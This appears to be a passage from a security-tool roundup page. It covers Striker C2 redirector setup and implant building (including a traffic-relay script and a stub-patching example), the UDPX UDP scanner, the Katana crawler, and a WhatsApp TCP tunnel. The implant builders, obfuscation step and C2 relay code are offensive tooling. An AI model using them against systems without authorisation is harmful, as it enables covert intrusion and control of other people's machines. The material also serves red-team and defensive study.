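print(f"[*] Redirecting {LISTEN} -> {BACKEND}")
while True:
    client, _ = srv.accept()
    upstream = socket.create_connection(BACKEND)
    # one thread per direction: client -> C2 and C2 -> client
    threading.Thread(target=shuttle, args=(client, upstream), daemon=True).start()
    threading.Thread(target=shuttle, args=(upstream, client), daemon=True).start()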

B) Nginx Reverse Proxy as Redirector

  1. Install Nginx;
$ sudo apt install nginx
  2. Create a vhost config (e.g: /etc/nginx/sites-available/striker);

Placeholders;

  • <domain-name> - This is your server's FQDN, and should match the one in your SSL cert.
  • <ssl-cert> - The SSL cert file to use.
  • <ssl-key> - The SSL key file to use.
  • <c2-server> - The full URL of the C2 server to forward requests to.

WARNING: client_max_body_size should be at least as large as the size defined by MAX_UPLOAD_SIZE in your backend/.env file, or uploads of large files will fail.

server {
    listen 443 ssl;
    server_name <domain-name>;
    ssl_certificate <ssl-cert>;
    ssl_certificate_key <ssl-key>;
    client_max_body_size 100M;
    access_log /var/log/nginx/striker.log;

    location / {
        proxy_pass <c2-server>;
        proxy_redirect off;
        proxy_ssl_verify off;
        proxy_read_timeout 90;
        proxy_http_version 1.1; # WebSocket upgrade requires HTTP/1.1
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "upgrade";
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }
}
  3. Enable it;
$ sudo ln -s /etc/nginx/sites-available/striker /etc/nginx/sites-enabled/striker
  4. Restart Nginx;
$ sudo service nginx restart

Your redirector should now be up and running on port 443, and can be tested using (assuming your FQDN is striker.local);

$ curl https://striker.local

If it works, you should get the 404 response used by the backend, like;

{"error":"Invalid route!"}

4. The Agents (Implants)

A) The C Agent

These are the implants used by Striker. The primary agent is written in C, and is located in agent/C/. It supports both linux and windows hosts. The linux agent depends externally on libcurl, which you will find installed in most systems.

The windows agent does not have an external dependency. It uses wininet for comms, which I believe is available on all windows hosts.

  1. Building for linux

Assuming you're on a 64-bit host, the following will build a 64-bit agent;

$ cd agent/C
$ mkdir bin
$ make

To build for 32 bit on a 64-bit host;

$ sudo apt install gcc-multilib
$ make arch=32

The above compiles everything into the bin/ directory. You will need only two files to generate working implants;

  • bin/stub - This is the agent stub that will be used as template to generate working implants.
  • bin/builder - This is what you will use to patch the agent stub to generate working implants.

The builder accepts the following arguments;

$ ./bin/builder 
[-] Usage: ./bin/builder <url> <auth_key> <delay> <stub> <outfile>

Where;

  • <url> - The server to report to. This should ideally be a redirector, but a direct URL to the server will also work.
  • <auth_key> - The authentication key to use when connecting to the C2. You can create this in the auth keys tab of the web UI.
  • <delay> - Delay between each callback, in seconds. This should be at least 2, depending on how noisy you want it to be.
  • <stub> - The stub file to read, bin/stub in this case.
  • <outfile> - The output filename of the new implant.

Example;

$ ./bin/builder https://localhost:3000 979a9d5ace15653f8ffa9704611612fc 5 bin/stub bin/striker
[*] Obfuscating strings...
[+] 69 strings obfuscated :)
[*] Finding offsets of our markers...
[+] Offsets:
URL: 0x0000a2e0
OBFS Key: 0x0000a280
Auth Key: 0x0000a2a0
Delay: 0x0000a260
[*] Patching...
[+] Operation completed!
  2. Building for windows

You will need MinGW for this. The following will install the 32- and 64-bit Windows dev environments;

$ sudo apt install mingw-w64

Build for 64 bit;

$ cd agent/C
$ mkdir bin
$ make target=win

To compile for 32 bit;

$ make target=win arch=32

This will compile everything into the bin/ directory, and you will have the stub and the builder as bin\stub.exe and bin\builder.exe, respectively.

B) The Python Agent

Striker also comes with a self-contained python agent (tested on python 2.7.16 and 3.7.3). This is located at agent/python/. Only the most basic features are implemented in this agent. Useful for hosts that can't run the C agent but have python installed.

There are 2 files in this directory;

  • stub.py - This is the payload stub to pass to the builder.
  • builder.py - This is what you'll be using to generate an implant.

Usage example:

$ ./builder.py
[-] Usage: builder.py <url> <auth_key> <delay> <stub> <outfile>
# The following will generate a working payload as `output.py`
$ ./builder.py http://localhost:3000 979a9d5ace15653f8ffa9704611612fc 2 stub.py output.py
[*] Loading agent stub...
[*] Writing configs...
[+] Agent built successfully: output.py
# Run it
$ python3 output.py
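
Both builders follow the same pattern: locate placeholder markers inside the stub and overwrite them with your configuration. A rough, hypothetical illustration of that patching approach follows; the marker names and slot sizes are invented, and the real builders use their own offsets plus string obfuscation.

# patch_stub.py - hypothetical illustration of marker-based stub patching
# (marker names and slot sizes are invented; Striker's builders use their
#  own markers and add string obfuscation on top)
import sys

def patch(data: bytes, marker: bytes, value: str) -> bytes:
    offset = data.find(marker)
    if offset < 0:
        raise ValueError(f"marker {marker!r} not found in stub")
    field = value.encode().ljust(len(marker), b"\x00")  # pad to the slot size
    if len(field) > len(marker):
        raise ValueError("value too long for marker slot")
    return data[:offset] + field + data[offset + len(marker):]

if __name__ == "__main__":
    url, auth_key, delay, stub, outfile = sys.argv[1:6]
    blob = open(stub, "rb").read()
    blob = patch(blob, b"__STRIKER_URL__" + b"\x00" * 241, url)       # 256-byte slot
    blob = patch(blob, b"__STRIKER_AUTH__" + b"\x00" * 48, auth_key)  # 64-byte slot
    blob = patch(blob, b"__STRIKER_DELAY__" + b"\x00" * 15, delay)    # 32-byte slot
    open(outfile, "wb").write(blob)
    print(f"[+] Patched implant written to {outfile}")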

Getting Started

After following the above instructions, Striker should now be ready for use. Kindly go through the usage guide. Have fun, and happy hacking!

Support

If you like the project, consider helping me turn coffee into code!



UDPX - Fast And Lightweight, UDPX Is A Single-Packet UDP Scanner Written In Go That Supports The Discovery Of Over 45 Services With The Ability To Add Custom Ones


Fast and lightweight, UDPX is a single-packet UDP scanner written in Go that supports the discovery of over 45 services with the ability to add custom ones. It is easy to use and portable, and can be run on Linux, Mac OS, and Windows. Unlike internet-wide scanners like zgrab2 and zmap, UDPX is designed for portability and ease of use.

  • It is fast. It can scan a whole /16 network in ~20 seconds for a single service.
  • You don't need to install libpcap or any other dependencies.
  • Can run on Linux, macOS, and Windows, or on your NetHunter if you built it for ARM.
  • Customizable. You can add your own probes and test for even more protocols.
  • Stores results in JSONL format.
  • Also scans domain names.

How it works

Scanning UDP ports is very different from scanning TCP: because UDP is a connectionless protocol, you may or may not get a result back from probing a UDP port. UDPX implements a single-packet approach: a protocol-specific packet is sent to the defined service (port) and UDPX waits for a response. The limit is 500 ms by default and can be changed with the -w flag. If the service sends a packet back within this time, it is certainly listening on that port and is reported as open.

A typical technique is to send a 0-byte UDP packet to each port on the target machine. If we receive an "ICMP Port Unreachable" message, the port is closed. If a UDP response is received to the probe (unusual), the port is open. If we get no response at all, the state is open or filtered, meaning that the port is either open or packet filters are blocking the communication. This method is not implemented, as it adds no value here (UDPX tests only for specific protocols).
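
To make the single-packet idea concrete, here is a minimal sketch of the concept in Python. The NTP payload is a standard client request; UDPX's actual probes live in pkg/probes/probes.go.

# udp_probe.py - single-packet UDP probe sketch (the concept behind UDPX;
# its real probes live in pkg/probes/probes.go)
import socket

def probe(host, port, payload, timeout=0.5):
    """Send one datagram; any reply within the timeout means 'open'."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)  # UDPX's default is 500 ms (-w flag)
        s.sendto(payload, (host, port))
        try:
            s.recvfrom(4096)
            return True   # got a reply: a service is listening
        except socket.timeout:
            return False  # no reply: open|filtered, not reported as open

# standard 48-byte NTP v3 client request (first byte: LI=0, VN=3, Mode=3)
ntp_payload = b"\x1b" + 47 * b"\x00"
print(probe("pool.ntp.org", 123, ntp_payload))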

Usage

Concurrency: By default, concurrency is set to 32 connections only (so you don't crash anything). If you have a lot of hosts to scan, you can set it to 128 or 256 connections. Based on your hardware, connection stability, and ulimit (on *nix), you can run 512 or more concurrent connections, but this is not recommended.

To scan a single IP:

udpx -t 1.1.1.1

To scan a CIDR with a maximum of 128 connections and a timeout of 1000 ms:

udpx -t 1.2.3.4/24 -c 128 -w 1000

To scan targets from a file with a maximum of 128 connections, for only a specific service:

udpx -tf targets.txt -c 128 -s ipmi

Target can be:

  • IP address
  • CIDR
  • Domain

IPv6 is supported.

If you want to store the results, use the flag -o [filename]. Output is in JSONL format, as can be seen below:

{"address":"45.33.32.156","hostname":"scanme.nmap.org","port":123,"service":"ntp","response_data":"JAME6QAAAEoAAA56LU9vp+d2ZPwOYIyDxU8jS3GxUvM="}

Options


__ ______ ____ _ __
/ / / / __ \/ __ \ |/ /
/ / / / / / / /_/ / /
/ /_/ / /_/ / ____/ |
\____/_____/_/ /_/|_|
v1.0.2-beta, by @nullt3r

Usage of ./udpx-linux-amd64:
-c int
Maximum number of concurrent connections (default 32)
-nr
Do not randomize addresses
-o string
Output file to write results
-s string
Scan only for a specific service, one of: ard, bacnet, bacnet_rpm, chargen, citrix, coap, db, db, digi1, digi2, digi3, dns, ipmi, ldap, mdns, memcache, mssql, nat_port_mapping, natpmp, netbios, netis, ntp, ntp_monlist, openvpn, pca_nq, pca_st, pcanywhere, portmap, qotd, rdp, ripv, sentinel, sip, snmp1, snmp2, snmp3, ssdp, tftp, ubiquiti, ubiquiti_discovery_v1, ubiquiti_discovery_v2, upnp, valve, wdbrpc, wsd, wsd_malformed, xdmcp, kerberos, ike
-sp
Show received packets (only first 32 bytes)
-t string
IP/CIDR to scan
-tf string
File containing IPs/CIDRs to scan
-w int
Maximum time to wait for a response (socket timeout) in ms (default 500)

Building

You can grab prebuilt binaries in the release section. If you want to build UDPX from source, follow these steps:

From git:

git clone https://github.com/nullt3r/udpx
cd udpx
go build ./cmd/udpx

You can find the binary in the current directory.

Or via go:

go install -v github.com/nullt3r/udpx/cmd/udpx@latest

After that, you can find the binary in $HOME/go/bin/udpx. If you want, move binary to /usr/local/bin/ so you can call it directly.

Supported services

UDPX supports more than 45 services. The most interesting are:

  • ipmi
  • snmp
  • ike
  • tftp
  • openvpn
  • kerberos
  • ldap

The complete list of supported services:

  • ard
  • bacnet
  • bacnet_rpm
  • chargen
  • citrix
  • coap
  • db
  • db
  • digi1
  • digi2
  • digi3
  • dns
  • ipmi
  • ldap
  • mdns
  • memcache
  • mssql
  • nat_port_mapping
  • natpmp
  • netbios
  • netis
  • ntp
  • ntp_monlist
  • openvpn
  • pca_nq
  • pca_st
  • pcanywhere
  • portmap
  • qotd
  • rdp
  • ripv
  • sentinel
  • sip
  • snmp1
  • snmp2
  • snmp3
  • ssdp
  • tftp
  • ubiquiti
  • ubiquiti_discovery_v1
  • ubiquiti_discovery_v2
  • upnp
  • valve
  • wdbrpc
  • wsd
  • wsd_malformed
  • xdmcp
  • kerberos
  • ike

How to add your own probe?

Please send a feature request with the protocol name and port, and I will make it happen. Or add it on your own: the file pkg/probes/probes.go contains all available payloads. Specify the protocol name, port, and packet data (hex-encoded).

{
    Name: "ike",
    Payloads: []string{"5b5e64c03e99b51100000000000000000110020000000000000001500000013400000001000000010000012801010008030000240101"},
    Port: []int{500, 4500},
},

Credits

Disclaimer

I am not responsible for any damages. You are responsible for your own actions. Scanning or attacking targets without prior mutual consent can be illegal.

License

UDPX is distributed under MIT License.



Katana - A Next-Generation Crawling And Spidering Framework


A next-generation crawling and spidering framework

Features • Installation • Usage • Scope • Config • Filters • Join Discord

Features

  • Fast and fully configurable web crawling
  • Standard and Headless mode support
  • JavaScript parsing / crawling
  • Customizable automatic form filling
  • Scope control - Preconfigured field / Regex
  • Customizable output - Preconfigured fields
  • INPUT - STDIN, URL and LIST
  • OUTPUT - STDOUT, FILE and JSON

Installation

katana requires Go 1.18 to install successfully. To install, just run the below command or download a pre-compiled binary from the release page.

go install github.com/projectdiscovery/katana/cmd/katana@latest

Usage

katana -h

This will display help for the tool. Here are all the switches it supports.

Usage:
./katana [flags]

Flags:
INPUT:
-u, -list string[] target url / list to crawl

CONFIGURATION:
-d, -depth int maximum depth to crawl (default 2)
-jc, -js-crawl enable endpoint parsing / crawling in javascript file
-ct, -crawl-duration int maximum duration to crawl the target for
-kf, -known-files string enable crawling of known files (all,robotstxt,sitemapxml)
-mrs, -max-response-size int maximum response size to read (default 2097152)
-timeout int time to wait for request in seconds (default 10)
-aff, -automatic-form-fill enable optional automatic form filling (experimental)
-retry int number of times to retry the request (default 1)
-proxy string http/socks5 proxy to use
-H, -headers string[] custom header/cookie to include in request
-config string path to the katana configuration file
-fc, -form-config string path to custom form configuration file

DEBUG:
-health-check, -hc run diagnostic check up
-elog, -error-log string file to write sent requests error log

HEADLESS:
-hl, -headless enable headless hybrid crawling (experimental)
-sc, -system-chrome use local installed chrome browser instead of katana installed
-sb, -show-browser show the browser on the screen with headless mode
-ho, -headless-options string[] start headless chrome with additional options
-nos, -no-sandbox start headless chrome in --no-sandbox mode
-scp, -system-chrome-path string use specified chrome binary path for headless crawling
-noi, -no-incognito start headless chrome without incognito mode

SCOPE:
-cs, -crawl-scope string[] in scope url regex to be followed by crawler
-cos, -crawl-out-scope string[] out of scope url regex to be excluded by crawler
-fs, -field-scope string pre-defined scope field (dn,rdn,fqdn) (default "rdn")
-ns, -no-scope disables host based default scope
-do, -display-out-scope display external endpoint from scoped crawling

FILTER:
-f, -field string field to display in output (url,path,fqdn,rdn,rurl,qurl,qpath,file,key,value,kv,dir,udir)
-sf, -store-field string field to store in per-host output (url,path,fqdn,rdn,rurl,qurl,qpath,file,key,value,kv,dir,udir)
-em, -extension-match string[] match output for given extension (eg, -em php,html,js)
-ef, -extension-filter string[] filter output for given extension (eg, -ef png,css)

RATE-LIMIT:
-c, -concurrency int number of concurrent fetchers to use (default 10)
-p, -parallelism int number of concurrent inputs to process (default 10)
-rd, -delay int request delay between each request in seconds
-rl, -rate-limit int maximum requests to send per second (default 150)
-rlm, -rate-limit-minute int maximum number of requests to send per minute

OUTPUT:
-o, -output string file to write output to
-j, -json write output in JSONL(ines) format
-nc, -no-color disable output content coloring (ANSI escape codes)
-silent display output only
-v, -verbose display verbose output
-version display project version

Running Katana

Input for katana

katana requires a URL or endpoint to crawl and accepts single or multiple inputs.

An input URL can be provided using the -u option, and multiple values can be provided as comma-separated input; similarly, file input is supported using the -list option, and piped input (stdin) is also supported.

URL Input

katana -u https://tesla.com

Multiple URL Input (comma-separated)

katana -u https://tesla.com,https://google.com

List Input

$ cat url_list.txt

https://tesla.com
https://google.com
katana -list url_list.txt

STDIN (piped) Input

echo https://tesla.com | katana
cat domains | httpx | katana

Example running katana -

katana -u https://youtube.com

__ __
/ /_____ _/ /____ ____ ___ _
/ '_/ _ / __/ _ / _ \/ _ /
/_/\_\\_,_/\__/\_,_/_//_/\_,_/ v0.0.1

projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
https://www.youtube.com/
https://www.youtube.com/about/
https://www.youtube.com/about/press/
https://www.youtube.com/about/copyright/
https://www.youtube.com/t/contact_us/
https://www.youtube.com/creators/
https://www.youtube.com/ads/
https://www.youtube.com/t/terms
https://www.youtube.com/t/privacy
https://www.youtube.com/about/policies/
https://www.youtube.com/howyoutubeworks?utm_campaign=ytgen&utm_source=ythp&utm_medium=LeftNav&utm_content=txt&u=https%3A%2F%2Fwww.youtube.com%2Fhowyoutubeworks%3Futm_source%3Dythp%26utm_medium%3DLeftNav%26utm_campaign%3Dytgen
https://www.youtube.com/new
https://m.youtube.com/
https://www.youtube.com/s/desktop/4965577f/jsbin/desktop_polymer.vflset/desktop_polymer.js
https://www.youtube.com/s/desktop/4965577f/cssbin/www-main-desktop-home-page-skeleton.css
https://www.youtube.com/s/desktop/4965577f/cssbin/www-onepick.css
https://www.youtube.com/s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.0Zo5FUcPkCg.L.B1.O/am=gAE/d=0/rs=AGKMywG5nh5Qp-BGPbOaI1evhF5BVGRZGA
https://www.youtube.com/opensearch?locale=en_GB
https://www.youtube.com/manifest.webmanifest
https://www.youtube.com/s/desktop/4965577f/cssbin/www-main-desktop-watch-page-skeleton.css
https://www.youtube.com/s/desktop/4965577f/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.js
https://www.youtube.com/s/desktop/4965577f/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.js
https://www.youtube.com/s/desktop/4965577f/jsbin/webcomponents-sd.vflset/webcomponents-sd.js
https://www.youtube.com/s/desktop/4965577f/jsbin/intersection-observer.min.vflset/intersection-observer.min.js
https://www.youtube.com/s/desktop/4965577f/jsbin/scheduler.vflset/scheduler.js
https://www.youtube.com/s/desktop/4965577f/jsbin/www-i18n-constants-en_GB.vflset/www-i18n-constants.js
https://www.youtube.com/s/desktop/4965577f/jsbin/www-tampering.vflset/www-tampering.js
https://www.youtube.com/s/desktop/4965577f/jsbin/spf.vflset/spf.js
https://www.youtube.com/s/desktop/4965577f/jsbin/network.vflset/network.js
https://www.youtube.com/howyoutubeworks/
https://www.youtube.com/trends/
https://www.youtube.com/jobs/
https://www.youtube.com/kids/

Crawling Mode

Standard Mode

The standard crawling mode uses the standard Go http library under the hood to handle HTTP requests/responses. This mode is much faster as it doesn't have the browser overhead. Still, it analyzes HTTP response bodies as-is, without any JavaScript or DOM rendering, potentially missing post-DOM-rendered endpoints or asynchronous endpoint calls that occur in complex web applications depending, for example, on browser-specific events.

Headless Mode

Headless mode hooks internal headless calls to handle HTTP requests/responses directly within the browser context. This offers two advantages:

  • The HTTP fingerprint (TLS and user agent) fully identifies the client as a legitimate browser
  • Better coverage, since endpoints are discovered by analyzing both the standard raw response (as in the previous mode) and the browser-rendered one with JavaScript enabled.

Headless crawling is optional and can be enabled using the -headless option.

Here are other headless CLI options -

katana -h headless

Flags:
HEADLESS:
-hl, -headless enable experimental headless hybrid crawling
-sc, -system-chrome use local installed chrome browser instead of katana installed
-sb, -show-browser show the browser on the screen with headless mode
-ho, -headless-options string[] start headless chrome with additional options
-nos, -no-sandbox start headless chrome in --no-sandbox mode
-noi, -no-incognito start headless chrome without incognito mode

-no-sandbox

Runs headless chrome browser with no-sandbox option, useful when running as root user.

katana -u https://tesla.com -headless -no-sandbox

-no-incognito

Runs headless chrome browser without incognito mode, useful when using the local browser.

katana -u https://tesla.com -headless -no-incognito

-headless-options

When crawling in headless mode, additional chrome options can be specified using -headless-options, for example -

katana -u https://tesla.com -headless -system-chrome -headless-options --disable-gpu,proxy-server=http://127.0.0.1:8080

Scope Control

Crawling can be endless if not scoped; as such, katana comes with multiple options to define the crawl scope.

-field-scope

The handiest option to define scope, using a predefined field name, rdn being the default field scope.

  • rdn - crawling scoped to root domain name and all subdomains (e.g. *example.com) (default)
  • fqdn - crawling scoped to given sub(domain) (e.g. www.example.com or api.example.com)
  • dn - crawling scoped to domain name keyword (e.g. example)
katana -u https://tesla.com -fs dn

-crawl-scope

For advanced scope control, the -cs option can be used, which comes with regex support.

katana -u https://tesla.com -cs login

For multiple in-scope rules, a file with one string / regex per line can be passed.

$ cat in_scope.txt

login/
admin/
app/
wordpress/
katana -u https://tesla.com -cs in_scope.txt

-crawl-out-scope

For defining what not to crawl, the -cos option can be used, which also supports regex input.

katana -u https://tesla.com -cos logout

For multiple out-of-scope rules, a file with one string / regex per line can be passed.

$ cat out_of_scope.txt

/logout
/log_out
katana -u https://tesla.com -cos out_of_scope.txt

-no-scope

Katana scopes to *.domain by default; the -ns option can be used to disable this, including to crawl the internet.

katana -u https://tesla.com -ns

-display-out-scope

By default, when a scope option is used, it also applies to the links displayed as output; as such, external URLs are excluded by default. To override this behavior, the -do option can be used to display all the external URLs found on in-scope URLs / endpoints.

katana -u https://tesla.com -do

Here are all the CLI options for scope control -

katana -h scope

Flags:
SCOPE:
-cs, -crawl-scope string[] in scope url regex to be followed by crawler
-cos, -crawl-out-scope string[] out of scope url regex to be excluded by crawler
-fs, -field-scope string pre-defined scope field (dn,rdn,fqdn) (default "rdn")
-ns, -no-scope disables host based default scope
-do, -display-out-scope display external endpoint from scoped crawling

Crawler Configuration

Katana comes with multiple options to configure and control the crawl the way we want.

-depth

Option to define the depth to which URLs are followed while crawling; the greater the depth, the more endpoints crawled and the longer the crawl takes.

katana -u https://tesla.com -d 5

-js-crawl

Option to enable JavaScript file parsing and crawling of the endpoints discovered in JavaScript files, disabled by default.

katana -u https://tesla.com -jc

-crawl-duration

Option to set a predefined crawl duration, disabled by default.

katana -u https://tesla.com -ct 2

-known-files

Option to enable crawling of robots.txt and sitemap.xml files, disabled by default.

katana -u https://tesla.com -kf robotstxt,sitemapxml

-automatic-form-fill

Option to enable automatic form filling for known / unknown fields; known field values can be customized as needed by updating the form config file at $HOME/.config/katana/form-config.yaml.

Automatic form filling is an experimental feature.

   -aff, -automatic-form-fill  enable optional automatic form filling (experimental)

There are more options to configure when needed; here are all the config-related CLI options -

katana -h config

Flags:
CONFIGURATION:
-d, -depth int maximum depth to crawl (default 2)
-jc, -js-crawl enable endpoint parsing / crawling in javascript file
-ct, -crawl-duration int maximum duration to crawl the target for
-kf, -known-files string enable crawling of known files (all,robotstxt,sitemapxml)
-mrs, -max-response-size int maximum response size to read (default 2097152)
-timeout int time to wait for request in seconds (default 10)
-retry int number of times to retry the request (default 1)
-proxy string http/socks5 proxy to use
-H, -headers string[] custom header/cookie to include in request
-config string path to the katana configuration file
-fc, -form-config string path to custom form configuration file

Filters

-field

Katana comes with built-in fields that can be used to filter the output for the desired information; the -f option can be used to specify any of the available fields.

   -f, -field string  field to display in output (url,path,fqdn,rdn,rurl,qurl,qpath,file,key,value,kv,dir,udir)

Here is a table with examples of each field and expected output when used -

FIELD DESCRIPTION EXAMPLE
url URL Endpoint https://admin.projectdiscovery.io/admin/login?user=admin&password=admin
qurl URL including query param https://admin.projectdiscovery.io/admin/login.php?user=admin&password=admin
qpath Path including query param /login?user=admin&password=admin
path URL Path https://admin.projectdiscovery.io/admin/login
fqdn Fully Qualified Domain name admin.projectdiscovery.io
rdn Root Domain name projectdiscovery.io
rurl Root URL https://admin.projectdiscovery.io
file Filename in URL login.php
key Parameter keys in URL user,password
value Parameter values in URL admin,admin
kv Keys=Values in URL user=admin&password=admin
dir URL Directory name /admin/
udir URL with Directory https://admin.projectdiscovery.io/admin/

Here is an example of using the field option to display only URLs with query parameters in them -

katana -u https://tesla.com -f qurl -silent

https://shop.tesla.com/en_au?redirect=no
https://shop.tesla.com/en_nz?redirect=no
https://shop.tesla.com/product/men_s-raven-lightweight-zip-up-bomber-jacket?sku=1740250-00-A
https://shop.tesla.com/product/tesla-shop-gift-card?sku=1767247-00-A
https://shop.tesla.com/product/men_s-chill-crew-neck-sweatshirt?sku=1740176-00-A
https://www.tesla.com/about?redirect=no
https://www.tesla.com/about/legal?redirect=no
https://www.tesla.com/findus/list?redirect=no

Custom Fields

You can create custom fields to extract and store specific information from page responses using regex rules. These custom fields are defined using a YAML config file and are loaded from the default location at $HOME/.config/katana/field-config.yaml. Alternatively, you can use the -flc option to load a custom field config file from a different location. Here is an example custom field.

- name: email
  type: regex
  regex:
    - '([a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)'
    - '([a-zA-Z0-9+._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)'

- name: phone
  type: regex
  regex:
    - '\d{3}-\d{8}|\d{4}-\d{7}'

When defining custom fields, the following attributes are supported:

  • name (required)

The value of the name attribute is used as the -field CLI option value.

  • type (required)

The type of custom attribute, currently supported option - regex

  • part (optional)

The part of the response to extract the information from. The default value is response, which includes both the header and body. Other possible values are header and body.

  • group (optional)

You can use this attribute to select a specific matched group in regex, for example: group: 1

Running katana using custom field:

katana -u https://tesla.com -f email,phone

-store-field

To complement the field option, which is useful for filtering output at run time, there is the -sf, -store-field option, which works exactly like the field option except that instead of filtering, it stores all the information on disk under the katana_field directory, sorted by target URL.

katana -u https://tesla.com -sf key,fqdn,qurl -silent
$ ls katana_field/

https_www.tesla.com_fqdn.txt
https_www.tesla.com_key.txt
https_www.tesla.com_qurl.txt

The -store-field option can be useful for collecting information to build a targeted wordlist for various purposes, including but not limited to:

  • Identifying the most commonly used parameters
  • Discovering frequently used paths
  • Finding commonly used files
  • Identifying related or unknown subdomains

-extension-match

Crawl output can easily be matched for specific extensions using the -em option, which displays only output containing the given extensions.

katana -u https://tesla.com -silent -em js,jsp,json

-extension-filter

Crawl output can easily be filtered for specific extensions using the -ef option, which removes all URLs containing the given extensions.

katana -u https://tesla.com -silent -ef css,txt,md

Here are additional filter options -

   -f, -field string                field to display in output (url,path,fqdn,rdn,rurl,qurl,file,key,value,kv,dir,udir)
-sf, -store-field string field to store in per-host output (url,path,fqdn,rdn,rurl,qurl,file,key,value,kv,dir,udir)
-em, -extension-match string[] match output for given extension (eg, -em php,html,js)
-ef, -extension-filter string[] filter output for given extension (eg, -ef png,css)

Rate Limit

It's easy to get blocked / banned while crawling if you don't respect target websites' limits; katana comes with multiple options to tune the crawl to go as fast / slow as we want.

-delay

Option to introduce a delay in seconds between each new request katana makes while crawling, disabled by default.

katana -u https://tesla.com -delay 20

-concurrency

Option to control the number of URLs per target fetched at the same time.

katana -u https://tesla.com -c 20

-parallelism

Option to define the number of targets from list input to process at the same time.

katana -u https://tesla.com -p 20

-rate-limit

Option to define the maximum number of requests that can go out per second.

katana -u https://tesla.com -rl 100

-rate-limit-minute

Option to define the maximum number of requests that can go out per minute.

katana -u https://tesla.com -rlm 500

Here are all the long / short CLI options for rate-limit control -

katana -h rate-limit

Flags:
RATE-LIMIT:
-c, -concurrency int number of concurrent fetchers to use (default 10)
-p, -parallelism int number of concurrent inputs to process (default 10)
-rd, -delay int request delay between each request in seconds
-rl, -rate-limit int maximum requests to send per second (default 150)
-rlm, -rate-limit-minute int maximum number of requests to send per minute

Output

Katana supports file output in both plain text and JSON format; the JSON output includes additional information like source, tag, and attribute name to correlate the discovered endpoint.

-output

By default, katana outputs the crawled endpoints in plain text format. The results can be written to a file by using the -output option.

katana -u https://example.com -no-scope -output example_endpoints.txt

-json

katana -u https://example.com -json -do | jq .
{
"timestamp": "2022-11-05T22:33:27.745815+05:30",
"endpoint": "https://www.iana.org/domains/example",
"source": "https://example.com",
"tag": "a",
"attribute": "href"
}
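
Because each line is a self-contained JSON object, the JSONL output is easy to post-process beyond jq. For example, a short sketch that tallies discovered endpoints by their source page (field names match the sample record above):

# tally_sources.py - post-process katana -json output (JSONL);
# field names are taken from the sample record above
import json
import sys
from collections import Counter

sources = Counter()
for line in sys.stdin:
    line = line.strip()
    if not line:
        continue
    record = json.loads(line)
    sources[record["source"]] += 1  # which page yielded each endpoint

for source, count in sources.most_common(10):
    print(f"{count:5d}  {source}")

# usage: katana -u https://example.com -json | python3 tally_sources.py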

-store-response

The -store-response option allows for writing all crawled endpoint requests and responses to a text file. When this option is used, text files including the request and response will be written to the katana_response directory. If you would like to specify a custom directory, you can use the -store-response-dir option.

katana -u https://example.com -no-scope -store-response
$ cat katana_response/index.txt

katana_response/example.com/327c3fda87ce286848a574982ddd0b7c7487f816.txt https://example.com (200 OK)
katana_response/www.iana.org/bfc096e6dd93b993ca8918bf4c08fdc707a70723.txt http://www.iana.org/domains/reserved (200 OK)

Note:

-store-response option is not supported in -headless mode.

Here are additional CLI options related to output -

katana -h output

OUTPUT:
-o, -output string file to write output to
-sr, -store-response store http requests/responses
-srd, -store-response-dir string store http requests/responses to custom directory
-j, -json write output in JSONL(ines) format
-nc, -no-color disable output content coloring (ANSI escape codes)
-silent display output only
-v, -verbose display verbose output
-version display project version


Wa-Tunnel - Tunneling Internet Traffic Over Whatsapp


This is a Baileys-based piece of code that lets you tunnel TCP data through two WhatsApp accounts.

This can be useful in different situations, for example with network carriers that give unlimited WhatsApp data, or on airplanes where you also get unlimited social network data.

It uses Baileys since it's a WebSocket-based multi-device WhatsApp library, and could therefore be used on Android in the future, using Termux for example.

The idea is to use it with a proxy setup on the server like this: [Client (restricted access) -> Whatsapp -> Server -> Proxy -> Internet]

Apologies in advance, since JavaScript is not one of my primary coding languages :/

Use only for educational purposes.


How does it work?

It sends TCP network packets through WhatsApp text and file messages; depending on the number of characters, it splits them across different text messages or files.

To avoid being timed out by WhatsApp, it is limited to 20k characters per message by default (at the moment this is hardcoded in wasocket.js). I have done multiple tests: anything below that may get you banned for sending too many messages, and anything above 80k may time out.

If a network packet is over the limit (20k chars by default) it will be sent as a file, if enabled. If multiple network packets are cached, the same criteria apply.

File messages are sent as binary files; TCP responses are concatenated with a delimiter and compressed using brotli to reduce data usage.

It caches TCP socket responses to group them and send the maximum amount of data per message, reducing the number of messages, improving speed, and lowering the probability of getting banned.
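
That batching step (join cached responses with a delimiter, brotli-compress, and fall back to a file message when over the character cap) can be sketched roughly like this; the delimiter shown is made up, and the real values and logic live in wasocket.js:

# batch_sketch.py - rough illustration of the batching described above
# (the delimiter here is made up; the real values and logic live in wasocket.js)
import base64
import brotli  # pip install brotli

DELIMITER = b"|!|"   # hypothetical separator between cached TCP responses
CHAR_LIMIT = 20_000  # default per-message character cap mentioned above

def pack(responses):
    """Join cached responses, compress, and decide text vs. file message."""
    blob = brotli.compress(DELIMITER.join(responses))
    text = base64.b64encode(blob).decode()  # text messages must be printable
    return text, len(text) > CHAR_LIMIT     # True -> send as a file instead

payload, as_file = pack([b"HTTP/1.1 200 OK\r\n\r\nhello", b"HTTP/1.1 304 Not Modified\r\n\r\n"])
print(len(payload), "chars ->", "file message" if as_file else "text message")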

Performance improvements

Before: (without files and no response caching)

curl -x localhost:12345 https://www.youtube.com
- 50-80 messages
- 30-40 seconds

After: (with files and response caching)

curl -x localhost:12345 https://www.youtube.com
- 6-8 messages
- 7-15 seconds

In case you are not allowed to send files use the --disable-files flag when starting the server and client to disable this functionality.

Why?

I got the idea while travelling through South America, where network data on carriers is usually restricted to a few GBs while WhatsApp is usually unlimited. I created this library since I couldn't find any usable one at the time.

Setup

You must have access to two Whatsapp accounts, one for the server and one for the client. You can forward a local port or use an external proxy.

Server side

